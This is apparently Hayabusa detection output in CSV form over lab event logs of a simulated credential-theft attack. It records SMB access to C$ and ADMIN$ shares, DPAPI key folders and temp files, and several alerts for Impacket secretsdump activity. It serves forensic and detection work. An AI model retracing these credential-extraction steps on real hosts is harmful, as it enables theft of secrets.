0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.814 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.814 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.834 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.834 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.834 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.834 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.834 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.834 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.848 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.850 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.850 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.850 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.850 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.850 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.850 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.850 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.866 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.866 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.866 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.866 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.866 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.866 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.881 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.881 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.881 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.881 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.881 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.881 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.897 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.897 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.897 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.897 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.897 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.897 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.912 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.912 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.912 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.912 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.912 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Drivers\etc | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.912 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Drivers\etc\hosts | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.928 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.928 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.928 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Drivers\etc | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.928 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Drivers\etc\hosts | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.944 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.944 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.944 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32 | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.944 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\XwYybEmH.tmp | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.944 +09:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,../hayabusa-rules/sigma/builtin/security/win_impacket_secretdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.959 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.959 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.959 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32 | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.959 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\ZuExrArX.tmp | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.959 +09:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,../hayabusa-rules/sigma/builtin/security/win_impacket_secretdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 20:53:07.706 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:08.857 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\oyCCGQai.tmp | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:08.857 +09:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,../hayabusa-rules/sigma/builtin/security/win_impacket_secretdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:11.310 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\AqdQWnLE.tmp | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:11.310 +09:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,../hayabusa-rules/sigma/builtin/security/win_impacket_secretdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:11.601 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:11.617 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:11.617 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1111 | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:11.617 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 